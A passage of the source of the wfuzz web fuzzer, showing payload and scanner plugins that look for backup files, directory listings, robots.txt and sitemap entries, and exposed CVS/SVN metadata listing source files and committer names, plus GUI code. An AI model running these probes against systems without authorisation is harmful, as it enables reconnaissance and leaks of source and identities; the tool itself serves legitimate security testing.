6 | from wfuzz.fuzzobjects import FuzzResult, FuzzWordType
7 | from wfuzz.plugin_api.base import BasePayload
8 | from wfuzz.helpers.obj_dyn import rgetattr
9 |
10 |
11 | @moduleman_plugin
12 | class wfuzzp(BasePayload):
13 | name = "wfuzzp"
14 | author = ("Xavi Mendez (@xmendez)",)
15 | version = "0.2"
16 | description = (
17 | "This payload uses pickle.",
18 | "Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data.",
19 | "Never unpickle data received from an untrusted or unauthenticated source.",
20 | "See: https://blog.nelhage.com/2011/03/exploiting-pickle/",
21 | )
22 | summary = "Returns fuzz results' URL from a previous stored wfuzz session."
23 | category = ["default"]
24 | priority = 99
25 |
26 | parameters = (
27 | ("fn", "", True, "Filename of a valid wfuzz result file."),
28 | (
29 | "attr",
30 | None,
31 | False,
32 | "Attribute of fuzzresult to return. If not specified the whole object is returned.",
33 | ),
34 | )
35 |
36 | default_parameter = "fn"
37 |
38 | def __init__(self, params):
39 | BasePayload.__init__(self, params)
40 |
41 | self.__max = -1
42 | self.attr = self.params["attr"]
43 | self._it = self._gen_wfuzz(self.params["fn"])
44 |
45 | def count(self):
46 | return self.__max
47 |
48 | def get_next(self):
49 | next_item = next(self._it)
50 |
51 | return next_item if not self.attr else rgetattr(next_item, self.attr)
52 |
53 | def get_type(self):
54 | return FuzzWordType.FUZZRES if not self.attr else FuzzWordType.WORD
55 |
56 | def _gen_wfuzz(self, output_fn):
57 | try:
58 | with gzip.open(self.find_file(output_fn), "r+b") as output:
59 | while 1:
60 | item = pickle.load(output)
61 | if not isinstance(item, FuzzResult):
62 | raise FuzzExceptBadFile(
63 | "Wrong wfuzz payload format, the object read is not a valid fuzz result."
64 | )
65 |
66 | yield item
67 | except IOError as e:
68 | raise FuzzExceptBadFile("Error opening wfuzz payload file. %s" % str(e))
69 | except EOFError:
70 | return
71 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/printers/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/printers/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/scripts/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/backups.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.plugin_api.base import BasePlugin
3 |
4 | # Python 2 and 3
5 | try:
6 | from urllib.parse import urljoin
7 | except ImportError:
8 | from urlparse import urljoin
9 |
10 |
11 | @moduleman_plugin
12 | class backups(BasePlugin):
13 | name = "backups"
14 | summary = "Looks for known backup filenames."
15 | description = ("Looks for known backup filenames.",)
16 | "For example, given http://localhost.com/dir/index.html, it will perform the following requests",
17 | "* http://localhost/dir/index.EXTENSIONS",
18 | "* http://localhost/dir/index.html.EXTENSIONS",
19 | "* http://localhost/dir.EXTENSIONS",
20 | author = ("Xavi Mendez (@xmendez)",)
21 | version = "0.1"
22 | category = ["fuzzer", "active"]
23 | priority = 99
24 |
25 | parameters = (
26 | (
27 | "ext",
28 | ".bak,.tgz,.zip,.tar.gz,~,.rar,.old,.-.swp",
29 | False,
30 | "Extensions to look for.",
31 | ),
32 | )
33 |
34 | def __init__(self):
35 | BasePlugin.__init__(self)
36 | self.extensions = self.kbase["backups.ext"][0].split(",")
37 |
38 | def validate(self, fuzzresult):
39 | return fuzzresult.code != 404 and (
40 | fuzzresult.history.urlparse.fext not in self.extensions
41 | )
42 |
43 | def process(self, fuzzresult):
44 | # >>> urlparse.urlparse("http://www.localhost.com/kk/index.html?id=1")
45 | # ParseResult(scheme='http', netloc='www.localhost.com', path='/kk/index.html', params='', query='id=1', fragment='')
46 |
47 | for pre_extension in self.extensions:
48 | pre, nothing, extension = pre_extension.partition("-")
49 |
50 | # http://localhost/dir/test.html -----> test.BAKKK
51 | self.queue_url(
52 | urljoin(
53 | fuzzresult.url, pre + fuzzresult.history.urlparse.fname + extension
54 | )
55 | )
56 |
57 | # http://localhost/dir/test.html ---> test.html.BAKKK
58 | self.queue_url(
59 | urljoin(fuzzresult.url, fuzzresult.history.urlparse.ffname + extension)
60 | )
61 |
62 | # http://localhost/dir/test.html ----> dir.BAKKK
63 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/cookies.py:
--------------------------------------------------------------------------------
1 | from wfuzz.plugin_api.base import BasePlugin
2 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
3 |
4 |
5 | KBASE_NEW_COOKIE = "cookies.cookie"
6 |
7 |
8 | @moduleman_plugin
9 | class cookies(BasePlugin):
10 | name = "cookies"
11 | author = ("Xavi Mendez (@xmendez)",)
12 | version = "0.1"
13 | summary = "Looks for new cookies"
14 | description = ("Looks for new cookies",)
15 | category = ["info", "passive", "default"]
16 | priority = 99
17 |
18 | parameters = ()
19 |
20 | def __init__(self):
21 | BasePlugin.__init__(self)
22 |
23 | def validate(self, fuzzresult):
24 | return True
25 |
26 | def process(self, fuzzresult):
27 | new_cookies = list(fuzzresult.history.cookies.response.items())
28 |
29 | if len(new_cookies) > 0:
30 | for name, value in new_cookies:
31 |
32 | if (
33 | name != ""
34 | and KBASE_NEW_COOKIE not in self.kbase
35 | or name not in self.kbase[KBASE_NEW_COOKIE]
36 | ):
37 | self.kbase[KBASE_NEW_COOKIE] = name
38 | self.add_result(
39 | "cookie", "Cookie first set", "%s=%s" % (name, value)
40 | )
41 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/cvs_extractor.py:
--------------------------------------------------------------------------------
1 | # Python 2 and 3
2 | try:
3 | from urllib.parse import urljoin
4 | except ImportError:
5 | from urlparse import urljoin
6 |
7 | from wfuzz.plugin_api.urlutils import check_content_type
8 |
9 | from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
10 | from wfuzz.plugin_api.base import BasePlugin
11 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
12 |
13 | # Entries format based on:
14 | # http://docstore.mik.ua/orelly/other/cvs/cvs-CHP-6-SECT-9.htm
15 | # Good example at http://webscantest.com/CVS/Entries
16 |
17 |
18 | @moduleman_plugin
19 | class cvs_extractor(BasePlugin, DiscoveryPluginMixin):
20 | name = "cvs_extractor"
21 | author = ("Xavi Mendez (@xmendez)",)
22 | version = "0.1"
23 | summary = "Parses CVS/Entries file."
24 | description = ("Parses CVS/Entries file and enqueues found entries",)
25 | category = ["active", "discovery"]
26 | priority = 99
27 | parameters = ()
28 |
29 | def __init__(self):
30 | BasePlugin.__init__(self)
31 |
32 | def validate(self, fuzzresult):
33 | return (
34 | fuzzresult.url.find("CVS/Entries") >= 0
35 | and fuzzresult.code == 200
36 | and check_content_type(fuzzresult, "text")
37 | )
38 |
39 | def process(self, fuzzresult):
40 | base_url = urljoin(fuzzresult.url, "..")
41 |
42 | for line in fuzzresult.history.content.splitlines():
43 | record = line.split("/")
44 | if len(record) == 6 and record[1]:
45 | self.queue_url(urljoin(base_url, record[1]))
46 |
47 | # Directory
48 | if record[0] == "D":
49 | self.queue_url(urljoin(base_url, record[1]))
50 | self.queue_url(urljoin(base_url, "%s/CVS/Entries" % (record[1])))
51 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/grep.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from wfuzz.plugin_api.base import BasePlugin
4 | from wfuzz.exception import FuzzExceptPluginBadParams
5 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
6 |
7 |
8 | @moduleman_plugin
9 | class grep(BasePlugin):
10 | name = "grep"
11 | author = ("Xavi Mendez (@xmendez)",)
12 | version = "0.1"
13 | summary = "HTTP response grep"
14 | description = (
15 | "Extracts the given regex pattern from the HTTP response and prints it",
16 | "(It is not a filter operator)",
17 | )
18 | category = ["tools"]
19 | priority = 99
20 |
21 | parameters = (("regex", "", True, "Regex to perform the grep against."),)
22 |
23 | def __init__(self):
24 | BasePlugin.__init__(self)
25 | try:
26 | print(self.kbase["grep.regex"])
27 | self.regex = re.compile(
28 | self.kbase["grep.regex"][0], re.MULTILINE | re.DOTALL
29 | )
30 | except Exception:
31 | raise FuzzExceptPluginBadParams(
32 | "Incorrect regex or missing regex parameter."
33 | )
34 |
35 | def validate(self, fuzzresult):
36 | return True
37 |
38 | def process(self, fuzzresult):
39 | for r in self.regex.findall(fuzzresult.history.content):
40 | self.add_result("match", "Pattern match", r)
41 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/listing.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from wfuzz.plugin_api.base import BasePlugin
4 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
5 |
6 |
7 | @moduleman_plugin
8 | class listing(BasePlugin):
9 | name = "listing"
10 | author = ("Xavi Mendez (@xmendez)",)
11 | version = "0.1"
12 | summary = "Looks for directory listing vulnerabilities"
13 | description = ("Looks for directory listing vulnerabilities",)
14 | category = ["default", "passive"]
15 | priority = 99
16 |
17 | parameters = ()
18 |
19 | def __init__(self):
20 | BasePlugin.__init__(self)
21 |
22 | dir_indexing_regexes = []
23 |
24 | dir_indexing_regexes.append("Index of /")
25 | dir_indexing_regexes.append('<a href="\\?C=N;O=D">Name</a>')
26 | dir_indexing_regexes.append("Last modified</a>")
27 | dir_indexing_regexes.append("Parent Directory</a>")
28 | dir_indexing_regexes.append("Directory Listing for")
29 | dir_indexing_regexes.append("<TITLE>Folder Listing.")
30 | dir_indexing_regexes.append("<TITLE>Folder Listing.")
31 | dir_indexing_regexes.append('<table summary="Directory Listing" ')
32 | dir_indexing_regexes.append("- Browsing directory ")
33 | dir_indexing_regexes.append(
34 | '">\\[To Parent Directory\\]</a><br><br>'
35 | ) # IIS 6.0 and 7.0
36 | dir_indexing_regexes.append(
37 | '<A HREF=".*?">.*?</A><br></pre><hr></body></html>'
38 | ) # IIS 5.0
39 |
40 | self.regex = []
41 | for i in dir_indexing_regexes:
42 | self.regex.append(re.compile(i, re.MULTILINE | re.DOTALL))
43 |
44 | def validate(self, fuzzresult):
45 | return fuzzresult.code in [200]
46 |
47 | def process(self, fuzzresult):
48 | for r in self.regex:
49 | if len(r.findall(fuzzresult.history.content)) > 0:
50 | self.add_result("msg", "Directory listing identified", None)
51 | break
52 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/npm_deps.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from wfuzz.plugin_api.base import BasePlugin
4 | from wfuzz.exception import FuzzExceptPluginBadParams
5 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
6 |
7 |
8 | @moduleman_plugin
9 | class npm_deps(BasePlugin):
10 | name = "npm_deps"
11 | author = ("Xavi Mendez (@xmendez)",)
12 | version = "0.1"
13 | summary = "Looks for npm dependencies definition in js code"
14 | description = (
15 | "Extracts npm packages by using regex pattern from the HTTP response and prints it",
16 | )
17 | category = ["info"]
18 | priority = 99
19 |
20 | parameters = ()
21 |
22 | REGEX_PATT = re.compile(r'"([^"]+)":"([^"]+)"', re.MULTILINE | re.DOTALL)
23 | REGEX_DEP = re.compile(
24 | r"dependencies:\{(.*?)\}", re.MULTILINE | re.DOTALL | re.IGNORECASE
25 | )
26 | REGEX_DEV_DEP = re.compile(
27 | r"devdependencies:\{(.*?)\}", re.MULTILINE | re.DOTALL | re.IGNORECASE
28 | )
29 |
30 | def __init__(self):
31 | BasePlugin.__init__(self)
32 |
33 | def validate(self, fuzzresult):
34 | if fuzzresult.history.urlparse.fext != ".js" or fuzzresult.code != 200:
35 | return False
36 |
37 | self.match = self.REGEX_DEP.search(fuzzresult.history.content)
38 | self.match_dev = self.REGEX_DEV_DEP.search(fuzzresult.history.content)
39 |
40 | return self.match is not None or self.match_dev is not None
41 |
42 | def process(self, fuzzresult):
43 | if self.match_dev:
44 | for name, version in self.REGEX_PATT.findall(self.match_dev.group(1)):
45 | self.add_result("dependency", "npm dependency", name)
46 |
47 | if self.match:
48 | for name, version in self.REGEX_PATT.findall(self.match.group(1)):
49 | self.add_result("dev_dependency", "npm dev dependency", name)
50 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/robots.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | # Python 2 and 3
4 | if sys.version_info >= (3, 0):
5 | from urllib.parse import urljoin
6 | else:
7 | from urlparse import urljoin
8 |
9 | from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
10 | from wfuzz.plugin_api.base import BasePlugin
11 | from wfuzz.plugin_api.urlutils import check_content_type
12 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
13 |
14 |
15 | @moduleman_plugin
16 | class robots(BasePlugin, DiscoveryPluginMixin):
17 | name = "robots"
18 | author = ("Xavi Mendez (@xmendez)",)
19 | version = "0.1"
20 | summary = "Parses robots.txt looking for new content."
21 | description = ("Parses robots.txt looking for new content.",)
22 | category = ["active", "discovery"]
23 | priority = 99
24 |
25 | parameters = ()
26 |
27 | def __init__(self):
28 | BasePlugin.__init__(self)
29 |
30 | def validate(self, fuzzresult):
31 | return (
32 | fuzzresult.history.urlparse.ffname == "robots.txt"
33 | and fuzzresult.code == 200
34 | and check_content_type(fuzzresult, "text")
35 | )
36 |
37 | def process(self, fuzzresult):
38 | # Shamelessly (partially) copied from w3af's plugins/discovery/robotsReader.py
39 | for line in fuzzresult.history.content.split("\n"):
40 | line = line.strip()
41 |
42 | if (
43 | len(line) > 0
44 | and line[0] != "#"
45 | and (
46 | line.upper().find("ALLOW") == 0
47 | or line.upper().find("DISALLOW") == 0
48 | or line.upper().find("SITEMAP") == 0
49 | )
50 | ):
51 |
52 | url = line[line.find(":") + 1 :]
53 | url = url.strip(" *")
54 |
55 | if url:
56 | new_link = urljoin(fuzzresult.url, url)
57 | self.queue_url(new_link)
58 | self.add_result("link", "New link found", new_link)
59 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/screenshot.py:
--------------------------------------------------------------------------------
1 | from wfuzz.plugin_api.base import BasePlugin
2 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
3 |
4 | import subprocess
5 | import tempfile
6 | import pipes
7 | import os
8 | import re
9 |
10 |
11 | @moduleman_plugin
12 | class screenshot(BasePlugin):
13 | name = "screenshot"
14 | author = ("Xavi Mendez (@xmendez)",)
15 | version = "0.1"
16 | summary = "Performs a screen capture using linux cutycapt tool"
17 | description = (
18 | "Performs a screen capture using linux cutycapt tool",
19 | "The tool must be installed and in the executable path",
20 | )
21 | category = ["tools", "active"]
22 | priority = 99
23 |
24 | parameters = ()
25 |
26 | def __init__(self):
27 | BasePlugin.__init__(self)
28 |
29 | def validate(self, fuzzresult):
30 | return fuzzresult.code not in [404]
31 |
32 | def process(self, fuzzresult):
33 | temp_name = next(tempfile._get_candidate_names())
34 | defult_tmp_dir = tempfile._get_default_tempdir()
35 |
36 | filename = os.path.join(
37 | defult_tmp_dir,
38 | (temp_name + "_" + re.sub(r"[^a-zA-Z0-9_-]", "_", fuzzresult.url))[:200]
39 | + ".jpg",
40 | )
41 |
42 | subprocess.call(
43 | [
44 | "cutycapt",
45 | "--url=%s" % pipes.quote(fuzzresult.url),
46 | "--out=%s" % filename,
47 | "--insecure",
48 | "--print-backgrounds=on",
49 | ]
50 | )
51 | self.add_result("file", "Screnshot taken", filename)
52 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/sitemap.py:
--------------------------------------------------------------------------------
1 | from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
2 | from wfuzz.plugin_api.base import BasePlugin
3 | from wfuzz.exception import FuzzExceptResourceParseError
4 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
5 |
6 | import xml.dom.minidom
7 |
8 |
9 | @moduleman_plugin
10 | class sitemap(BasePlugin, DiscoveryPluginMixin):
11 | name = "sitemap"
12 | author = ("Xavi Mendez (@xmendez)",)
13 | version = "0.1"
14 | summary = "Parses sitemap.xml file"
15 | description = ("Parses sitemap.xml file",)
16 | category = ["active", "discovery"]
17 | priority = 99
18 |
19 | parameters = ()
20 |
21 | def __init__(self):
22 | BasePlugin.__init__(self)
23 |
24 | def validate(self, fuzzresult):
25 | return (
26 | fuzzresult.history.urlparse.ffname == "sitemap.xml"
27 | and fuzzresult.code == 200
28 | )
29 |
30 | def process(self, fuzzresult):
31 | try:
32 | dom = xml.dom.minidom.parseString(fuzzresult.history.content)
33 | except Exception:
34 | raise FuzzExceptResourceParseError(
35 | "Error while parsing %s." % fuzzresult.url
36 | )
37 |
38 | urlList = dom.getElementsByTagName("loc")
39 | for url in urlList:
40 | u = url.childNodes[0].data
41 |
42 | self.queue_url(u)
43 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/svn_extractor.py:
--------------------------------------------------------------------------------
1 | # Python 2 and 3
2 | try:
3 | from urllib.parse import urljoin
4 | except ImportError:
5 | from urlparse import urljoin
6 |
7 | from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
8 | from wfuzz.plugin_api.base import BasePlugin
9 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
10 |
11 |
12 | @moduleman_plugin
13 | class svn_extractor(BasePlugin, DiscoveryPluginMixin):
14 | name = "svn_extractor"
15 | author = ("Xavi Mendez (@xmendez)",)
16 | version = "0.1"
17 | summary = "Parses .svn/entries file."
18 | description = ("Parses CVS/Entries file and enqueues found entries",)
19 | category = ["active", "discovery"]
20 | priority = 99
21 |
22 | parameters = ()
23 |
24 | def __init__(self):
25 | BasePlugin.__init__(self)
26 |
27 | def validate(self, fuzzresult):
28 | return fuzzresult.url.find(".svn/entries") > 0 and fuzzresult.code == 200
29 |
30 | def readsvn(self, content):
31 | """
32 | Function shamesly copied (and adapted) from https://github.com/anantshri/svn-extractor/
33 | Credit (C) Anant Shrivastava http://anantshri.info
34 | """
35 | old_line = ""
36 | file_list = []
37 | dir_list = []
38 | author_list = []
39 |
40 | for a in content.splitlines():
41 | # below functionality will find all usernames from svn entries file
42 | if a == "has-props":
43 | if old_line not in author_list:
44 | author_list.append(old_line)
45 | if a == "file":
46 | if old_line not in file_list:
47 | file_list.append(old_line)
48 | if a == "dir":
49 | if old_line != "":
50 | dir_list.append(old_line)
51 | old_line = a
52 | return file_list, dir_list, author_list
53 |
54 | def process(self, fuzzresult):
55 | base_url = fuzzresult.url
56 |
57 | file_list, dir_list, author_list = self.readsvn(fuzzresult.history.content)
58 |
59 | if author_list:
60 | self.add_result("authors", "SVN authors", ", ".join(author_list))
61 |
62 | for f in file_list:
63 | u = urljoin(base_url.replace("/.svn/", "/"), f)
64 | self.queue_url(u)
65 |
66 | for d in dir_list:
67 | self.queue_url(
68 | urljoin(base_url.replace("/.svn/", "/"), d) + "/.svn/entries"
69 | )
70 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/title.py:
--------------------------------------------------------------------------------
1 | from wfuzz.plugin_api.base import BasePlugin
2 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
3 |
4 |
5 | @moduleman_plugin
6 | class title(BasePlugin):
7 | name = "title"
8 | author = ("Xavi Mendez (@xmendez)",)
9 | version = "0.1"
10 | summary = "Parses HTML page title"
11 | description = ("Parses HTML page title",)
12 | category = ["info", "passive"]
13 | priority = 99
14 |
15 | parameters = ()
16 |
17 | def __init__(self):
18 | BasePlugin.__init__(self)
19 |
20 | def validate(self, fuzzresult):
21 | return True
22 |
23 | def process(self, fuzzresult):
24 | soup = fuzzresult.history.get_soup()
25 | title = soup.title.string if soup.title else ""
26 |
27 | if (
28 | title != ""
29 | and "title" not in self.kbase
30 | or title not in self.kbase["title"]
31 | ):
32 | self.kbase["title"] = title
33 | self.add_result("title", "Page title", title)
34 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/wcdb.py:
--------------------------------------------------------------------------------
1 | # Python 2 and 3
2 | try:
3 | from urllib.parse import urljoin
4 | except ImportError:
5 | from urlparse import urljoin
6 |
7 | from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
8 | from wfuzz.plugin_api.base import BasePlugin
9 | from wfuzz.exception import FuzzExceptResourceParseError
10 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
11 |
12 | import tempfile
13 | import sqlite3
14 |
15 |
16 | @moduleman_plugin
17 | class wcdb_extractor(BasePlugin, DiscoveryPluginMixin):
18 | name = "wc_extractor"
19 | author = ("Xavi Mendez (@xmendez)",)
20 | version = "0.1"
21 | summary = "Parses subversion's wc.db file."
22 | description = ("Parses subversion's wc.db file.",)
23 | category = ["active", "discovery"]
24 | priority = 99
25 |
26 | parameters = ()
27 |
28 | def __init__(self):
29 | BasePlugin.__init__(self)
30 |
31 | def validate(self, fuzzresult):
32 | return fuzzresult.url.find(".svn/wc.d") > 0 and fuzzresult.code == 200
33 |
34 | def readwc(self, content):
35 | """
36 | Function shamesly copied (and adapted) from https://github.com/anantshri/svn-extractor/
37 | Credit (C) Anant Shrivastava http://anantshri.info
38 | """
39 | author_list = []
40 | list_items = None
41 | (fd, filename) = tempfile.mkstemp()
42 |
43 | with open(filename, "wb") as f:
44 | f.write(content)
45 |
46 | conn = sqlite3.connect(filename)
47 | c = conn.cursor()
48 | try:
49 | c.execute(
50 | 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES where kind="file";'
51 | )
52 | list_items = c.fetchall()
53 | # below functionality will find all usernames who have commited atleast once.
54 | c.execute("select distinct changed_author from nodes;")
55 | author_list = [r[0] for r in c.fetchall()]
56 | c.close()
57 | except Exception:
58 | raise FuzzExceptResourceParseError(
59 | "Error reading wc.db, either database corrupt or invalid file"
60 | )
61 |
62 | return author_list, list_items
63 |
64 | def process(self, fuzzresult):
65 | author_list, list_items = self.readwc(fuzzresult.history.content)
66 |
67 | if author_list:
68 | self.add_result("authors", "SVN authors", ", ".join(author_list))
69 |
70 | if list_items:
71 | for f, pristine in list_items:
72 | u = urljoin(fuzzresult.url.replace("/.svn/wc.db", "/"), f)
73 | if self.queue_url(u):
74 | self.add_result("source", "SVN source code", f)
75 |
--------------------------------------------------------------------------------
/src/wfuzz/ui/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/ui/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/ui/console/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/ui/console/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/ui/console/getch.py:
--------------------------------------------------------------------------------
1 | # http://code.activestate.com/recipes/134892/
2 | #
3 | # getch()-like unbuffered character reading from stdin on both Windows and Unix (Python recipe)
4 | # A small utility class to read single characters from standard input, on both Windows and UNIX systems. It provides a getch() function-like instance.
5 | #
6 | # Created by Danny Yoo on Fri, 21 Jun 2002 (PSF)
7 | # (http://code.activestate.com/recipes/users/98032/)
8 |
9 |
10 | class _Getch:
11 | """Gets a single character from standard input. Does not echo to the screen."""
12 |
13 | def __init__(self):
14 | try:
15 | self.impl = _GetchWindows()
16 | except ImportError:
17 | try:
18 | self.impl = _GetchUnix()
19 | except ImportError:
20 | self.impl = _GetchMacCarbon()
21 |
22 | def __call__(self):
23 | return self.impl()
24 |
25 |
26 | class _GetchUnix:
27 | def __init__(self):
28 | import tty
29 | import sys
30 |
31 | def __call__(self):
32 | import sys
33 | import tty
34 | import termios
35 |
36 | fd = sys.stdin.fileno()
37 | old_settings = termios.tcgetattr(fd)
38 | try:
39 | tty.setraw(sys.stdin.fileno())
40 | ch = sys.stdin.read(1)
41 | finally:
42 | termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
43 | return ch
44 |
45 |
46 | class _GetchWindows:
47 | def __init__(self):
48 | import msvcrt
49 |
50 | def __call__(self):
51 | import msvcrt
52 |
53 |
54 | class _GetchMacCarbon:
55 | """
56 | A function which returns the current ASCII key that is down;
57 | if no ASCII key is down, the null string is returned. The
58 | page http://www.mactech.com/macintosh-c/chap02-1.html was
59 | very helpful in figuring out how to do this.
60 | """
61 |
62 | def __init__(self):
63 | import Carbon
64 |
65 | # see if it has this (in Unix, it doesn't)
66 | Carbon.Evt
67 |
68 | def __call__(self):
69 | import Carbon
70 |
71 | if Carbon.Evt.EventAvail(0x0008)[0] == 0: # 0x0008 is the keyDownMask
72 | return ""
73 | else:
74 | #
75 | # The event contains the following info:
76 | # (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1]
77 | #
78 | # The message (msg) contains the ASCII char which is
79 | # extracted with the 0x000000FF charCodeMask; this
80 | # number is converted to an ASCII character with chr() and
81 | # returned
82 | #
83 | (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1]
84 | return chr(msg & 0x000000FF)
85 |
86 |
87 | if __name__ == "__main__":
88 | print("Press a key")
89 | inkey = _Getch()
90 |
91 | import sys
92 |
93 | for i in range(sys.maxsize):
94 | k = inkey()
95 | if k != "":
96 | break
97 | print("you pressed ", k)
98 |
--------------------------------------------------------------------------------
/src/wfuzz/ui/gui/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/ui/gui/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/ui/gui/controller.py:
--------------------------------------------------------------------------------
1 | import wx
2 |
3 | from .ui.console.clparser import CLParser
4 | from .ui.gui.model import GUIModel
5 | from .facade import Facade
6 |
7 | if "2.8" in wx.version():
8 | import wx.lib.pubsub.setupkwargs
9 | from wx.lib.pubsub import pub
10 | else:
11 | from wx.lib.pubsub import pub
12 |
13 |
14 | class WfuzzInterpreter:
15 | def __init__(self, model):
16 | self.model = model
17 |
18 | def onecmd(self, cmd):
19 | if cmd[0] == "wfuzz":
20 | self.do_wfuzz(cmd)
21 | elif cmd[0] == "clear":
22 | self.model.Clear()
23 | elif cmd[0] == "wfilter":
24 | self.do_wfilter(cmd)
25 | elif cmd[0] == "newtab":
26 | self.do_tab(cmd)
27 | elif cmd[0] == "del":
28 | self.do_delete(cmd)
29 |
30 | def do_wfilter(self, cmd):
31 | from wfuzz.core import dictionary
32 |
33 | try:
34 | session_options = CLParser(cmd).parse_cl()
35 | except SystemExit:
36 | print("\n")
37 | pass
38 | except Exception:
39 | pass
40 | else:
41 | for res in dictionary.from_options(session_options):
42 | r = res[0]
43 | if "FuzzResult" in str(r.__class__):
44 | r._fields = r.url
45 |
46 | self.model.AddRow(r)
47 |
48 | def do_wfuzz(self, cmd):
49 | try:
50 | session_options = CLParser(cmd).parse_cl().compile()
51 | except SystemExit:
52 | print("\n")
53 | pass
54 | except Exception:
55 | pass
56 | else:
57 | for res in session_options.fuzz():
58 | self.model.AddRow(res)
59 |
60 | def do_delete(self, cmd):
61 | self.model.DeleteRows_by_filter(cmd[1])
62 |
63 | def do_tab(self, cmd):
64 | data = Facade().data[cmd[1]] = []
65 | model = GUIModel(data)
66 | pub.sendMessage(
67 | "create_tab", name=cmd[1], model=model, interp=WfuzzInterpreter(model)
68 | )
69 |
70 |
71 | class GUIController:
72 | def __init__(self, view):
73 | Facade().mode = "gui"
74 | self.data = Facade().data = {"main": []}
75 | self._model = GUIModel(self.data["main"])
76 |
77 | self._view = view
78 | self._interp = WfuzzInterpreter(self._model)
79 |
80 | # init gui
81 | self.start_gui()
82 |
83 | pub.subscribe(self.on_exit, "exit")
84 |
85 | def start_gui(self):
86 | self._view.start_gui(self)
87 |
88 | def on_exit(self, msg):
89 | print("oooo")
90 |
--------------------------------------------------------------------------------
/src/wfuzz/ui/gui/model.py:
--------------------------------------------------------------------------------
1 | from collections import namedtuple
2 | import wx.dataview as dv
3 |
4 | from wfuzz.filters.ppfilter import FuzzResFilter
5 |
6 | Row = namedtuple("Row", "title colid width rtype field")
7 |
8 |
9 | class GUIModel(dv.PyDataViewIndexListModel):
10 | def __init__(self, data=None):
11 | self.data = data if data is not None else []
12 | dv.PyDataViewIndexListModel.__init__(self, len(self.data))
13 |
14 | self.row_mapper = {
15 | 0: Row(title="ID", colid=0, width=100, rtype="int", field="nres"),
16 | 1: Row(title="Response", colid=1, width=100, rtype="int", field="code"),
17 | 2: Row(title="Lines", colid=2, width=170, rtype="int", field="lines"),
18 | 3: Row(title="Words", colid=3, width=170, rtype="int", field="words"),
19 | 4: Row(title="Chars", colid=4, width=170, rtype="int", field="chars"),
20 | 5: Row(
21 | title="Payload", colid=5, width=170, rtype="string", field="description"
22 | ),
23 | }
24 |
25 | def GetColumnType(self, col):
26 | return self.row_mapper[col].rtype
27 |
28 | def GetValueByRow(self, row, col):
29 | try:
30 | return self.data[row].get_field(self.row_mapper[col].field)
31 | except IndexError:
32 | return ""
33 |
34 | def GetColumnCount(self):
35 | return len(self.row_mapper)
36 |
37 | def GetCount(self):
38 | return len(self.data)
39 |
40 | # Called to check if non-standard attributes should be used in the
41 | # cell at (row, col)
42 | def GetAttrByRow(self, row, col, attr):
43 | # #self.log.write('GetAttrByRow: (%d, %d)' % (row, col))
44 | # if col == 3:
45 | # attr.SetColour('blue')
46 | # attr.SetBold(True)
47 | # return True
48 | return False
49 |
50 | def Compare(self, item1, item2, col, ascending):
51 | if not ascending: # swap sort order?
52 | item2, item1 = item1, item2
53 | row1 = self.GetRow(item1)
54 | row2 = self.GetRow(item2)
55 |
56 | value1 = self.GetValueByRow(row1, col)
57 | value2 = self.GetValueByRow(row2, col)
58 | if self.row_mapper[col].rtype == "int":
59 | value1 = int(value1)
